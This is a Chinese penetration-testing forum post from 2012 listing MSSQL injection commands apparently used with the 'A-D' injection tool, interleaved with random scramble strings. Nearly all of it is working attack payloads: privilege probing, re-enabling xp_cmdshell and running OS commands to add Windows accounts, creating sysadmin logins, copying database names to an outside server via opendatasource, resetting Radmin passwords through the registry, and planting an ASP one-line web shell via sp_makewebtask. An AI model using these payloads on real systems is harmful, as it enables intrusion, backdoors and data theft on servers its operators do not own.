中国网络渗透测试联盟
标题:
阿D常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-13 17:26
标题:
阿D常用的一些注入命令
阿D常用的一些注入命令
1 n* W3 A. h& _9 u
//看看是什么权限的
$ l+ S1 ~/ Y0 o9 _) y) r0 y1 O: c u2 G
and 1=(Select IS_MEMBER('db_owner'))
5 H" t( r: u) P) l4 ^: L2 O( w
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
. u% h. _( W! T5 q
" M/ @9 H% J% @, ^4 }9 Q
//检测是否有读取某数据库的权限
S, [% J2 N& {- R' K
and 1= (Select HAS_DBACCESS('master'))
* p# [6 D& j2 ?! q0 `0 D
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
: L- C' Q+ f p) }" ]
) J- C& z9 e- i/ i4 T! I
* I4 I: T, p9 s( e) X5 s- |1 G
数字类型
5 `6 H0 j5 l1 ?# @. M+ ]) f
and char(124)%2Buser%2Bchar(124)=0
, w- z6 D7 M) _. m
' S8 U c( g3 c. u; }* _
字符类型
1 \4 L. M) D. @2 `7 b
' and char(124)%2Buser%2Bchar(124)=0 and ''='
( G3 V% x B9 O; a% K1 A- n
0 s' i# H8 x! L1 ]% J! s7 S
搜索类型
- {4 J+ Y+ H# g: d) H( {: X/ \
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
7 ~* j# N* Y$ v( g& H+ S) A
- a) r& ?& f* Y" R$ a3 K+ q
爆用户名
# Y8 } E+ X# N. {7 X
and user>0
" r0 ~' B6 ~ a
' and user>0 and ''='
+ V, \! V1 C7 a* z9 @6 q
1 l1 c8 j& P) H# H
检测是否为SA权限
6 X5 Q; z( O) T: i1 b
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: r% ]0 x4 M4 b( `3 ~# {
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' |8 M3 Q" z1 T. f" r
7 \: Y: U9 A6 l7 _6 k* n- Q
检测是不是MSSQL数据库
# L. `0 [5 H) ?( s# I' V
and exists (select * from sysobjects);--
% l0 E( A- ^$ a7 v; T- u2 {9 a
8 E6 Y: }. ~- Z5 l2 i I! D( P
检测是否支持多行
1 @0 T$ x N# f; T6 H# W2 ]' O
;declare @d int;--
[) W f* o" l* Z' `" J
* l4 V5 e! n% O: x, [" w" t9 g
恢复 xp_cmdshell
/ Q r d E; p. z/ }4 W# P- \, U
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
5 B- H7 i4 S; x0 V; w" n3 g; [
: Y, L3 }: }8 t5 S# V u: m
5 a, h8 K* A# V
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
) I" U1 O9 K, @8 u5 b& z
9 T; f7 c z0 R6 \ S+ }: }" ?5 e
//-----------------------
# m! \% {* S5 J* Z8 V9 F9 E
// 执行命令
. X* o6 {: E2 W+ |" \- Y
//-----------------------
7 i% m* ]8 _* H. g% O
首先开启沙盘模式:
) T# T- M; U0 _" m$ k
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. i7 S7 |& ]3 \/ P6 v. w# ~
1 C3 }' d( @' o, ?3 B2 e9 y* x
然后利用jet.oledb执行系统命令
. Z5 X: ~5 A# ]/ U6 x; t" C$ U
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
8 `4 t# R# g( Q- t2 n; r' p# {
5 B$ ]4 H1 W* i( o; V0 `* Y4 M& s+ e
执行命令
; @; ]; w& W& H+ ~7 q3 |- S
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
; R9 R4 w: A9 C% f
5 ~- f% A9 v2 k. _8 ?
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
4 {) \% Z4 z+ C
/ d) ^6 U' }$ v7 d5 h; y
判断xp_cmdshell扩展存储过程是否存在:
. |. C* b- o! ` U' ?, E* W) `" T
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
" E; r& R, b9 W+ z( S" w; N9 v
/ F' V2 i4 ~) T, M
写注册表
6 P4 A: |' e4 v4 ^8 q$ F5 I
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 P9 k2 ?: J6 v
" X" V/ _% B8 i$ n, ] p
REG_SZ
* M6 q, H; R! F0 Q( u' |
0 [4 }6 f. D& F& ~: V: f0 u
读注册表
/ V$ E/ o: Z) N/ k
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
1 a0 S5 P) W- v) ^9 P$ t; Q
" B# M/ ~- v' S. w: s! s
读取目录内容
/ P) z7 ^5 u/ w0 p e
exec master..xp_dirtree 'c:\winnt\system32\',1,1
& T( G7 B( r5 x; P3 c7 A
) P9 }3 |- r" x3 r0 r) G5 R- f
) R- W3 e7 _) a6 R) U1 d
数据库备份
! a0 x$ t$ P0 p
backup database pubs to disk = 'c:\123.bak'
! {6 y. P; h! }- P+ E2 O
" }4 s# }7 u9 Q( W5 a' b. o
//爆出长度
+ ?+ I( l$ B A4 `5 s* C
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
' ]; G, j# @# b I+ N- F
' f$ S# T2 Z, W1 {- Y
; w3 U5 C6 Z+ A+ |, f$ ^8 P& x! f8 K3 ? |
4 M& L# c9 h+ ]
更改sa口令方法:用sql综合利用工具连接后,执行命令:
: I2 _: L/ O6 ]( i3 I7 Y
exec sp_password NULL,'新密码','sa'
2 s- R" C$ e9 n$ r1 w' R: A
4 P3 x) {& W( U5 S0 M9 A$ \
添加和删除一个SA权限的用户test:
' D5 U1 O H6 z% t: P
exec master.dbo.sp_addlogin test,ptlove
9 q, N+ P. X: l* Y, c- ^4 O' K
exec master.dbo.sp_addsrvrolemember test,sysadmin
" ]6 n6 W5 S. Y
, E7 b; r2 C7 I$ m
删除扩展存储过过程xp_cmdshell的语句:
9 @/ _& A% i; K& }; `
exec sp_dropextendedproc 'xp_cmdshell'
2 ?! {) V! q v, l U
4 C G# Y1 d, P8 G% L' V
添加扩展存储过过程
8 `3 ]. {. x$ ~( g1 ]% p
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
2 M* w" ]+ i' a8 h: |
GRANT exec On xp_proxiedadata TO public
% Y* ~5 v+ I9 |: @9 S- u5 @0 w# c
" I* C; c9 ?+ I8 R- ?9 T
: L, L b8 K4 K0 x: y7 L1 R
停掉或激活某个服务。
' `* T$ @8 f4 R) s' h
0 R) w6 V s: V
exec master..xp_servicecontrol 'stop','schedule'
. j1 J# n& t" s* [1 @/ _& L8 m
exec master..xp_servicecontrol 'start','schedule'
# Z6 O( T( d+ a7 l. `) c6 T9 T
& \* y% P8 Z# E8 I3 _' U; C* J6 t9 V
dbo.xp_subdirs
2 f( \8 m* l1 T6 P% r- k4 {
8 h, A+ Q5 H7 u; ]1 R" r) a
只列某个目录下的子目录。
) Y. m, R. ?+ c, S; i4 x, v
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
3 l7 [/ D/ i5 o1 k' N: t
8 W1 T- V* c. ?" O9 a: _- V
dbo.xp_makecab
6 \% t+ K+ A; C" @0 m- g
' _. ^: ^0 P; W: H" I3 \1 c
将目标多个档案压缩到某个目标档案之内。
9 i% J# L4 h- l
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
) ?3 v' ~7 G: o$ R
) \0 ~9 c* u+ Z
dbo.xp_makecab
0 h5 K2 Y0 d" L6 ~8 ]" D/ ~# t6 S
'c:\test.cab','mszip',1,
6 w0 N8 w b0 y6 ?) P; v' D
'C:\Inetpub\wwwroot\SQLInject\login.asp',
" `2 n" j+ Z+ Y8 d/ j# }5 D' W
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
) D2 @2 `. f0 W, b; g1 ^% T+ E" E! ~
, |9 W/ U+ W8 o7 b9 ?
xp_terminate_process
j: G' B1 w' h3 E9 r
! c# z7 ~$ _/ t9 }( ~% R9 X. I
停掉某个执行中的程序,但赋予的参数是 Process ID。
* H' w( z" C; q) ^- m0 U E
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
( H/ Y1 y; b# l$ Q! J
& ~1 i+ E% m& O; N5 B1 [( c7 X
xp_terminate_process 2484
7 ]4 o0 @* d7 V. z3 Z
) x0 L" ?) M4 k. G7 a; I
xp_unpackcab
: d( ]. L) ]2 Y( @
1 f6 ^" @5 x! d) s
解开压缩档。
6 U' H3 \: u! [2 V+ k
, v8 e* Q, U& L0 H* n
xp_unpackcab 'c:\test.cab','c:\temp',1
' p, [) K$ o% k: p$ y
( L" z. C$ C% Z; v% e) x
7 q* {0 h( E5 K# v1 U
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
# m* ?. X5 ~5 c/ f7 c) v
6 e$ I, s* v9 h8 c, c% Q1 `! k
create database lcx;
7 C4 h2 R* Y2 p! a
Create TABLE ku(name nvarchar(256) null);
0 r9 e, I1 r. q, Y
Create TABLE biao(id int NULL,name nvarchar(256) null);
1 J+ i3 {$ @& k2 G; ]& }
4 l! ?! w8 D7 s
//得到数据库名
+ y9 O( \3 M! _: A) a
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
7 K! ^$ { t- s8 p) [
8 j6 U D1 i& H" L: S/ A/ l0 K" R
1 _0 ~; w( W; B/ ?( u) f6 f8 W' ?
//在Master中创建表,看看权限怎样
/ C) W1 w2 X# b* m( K
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
+ a- F5 r9 n' U
- J& d7 j0 v0 v: N0 K
用 sp_makewebtask直接在web目录里写入一句话马:
3 D1 s/ X0 h5 p6 P$ Z9 s
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
1 D) T4 N4 y- q: X
$ ]* F& |1 n x. u! b. _
//更新表内容
. Y0 p" Z) k2 i- x1 d2 Y9 j6 a4 B
Update films SET kind = 'Dramatic' Where id = 123
$ t E- J- A5 R! G1 C
' f, N' w, F+ p, q: J# p( y" F
//删除内容
7 @2 D1 t$ R3 P
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2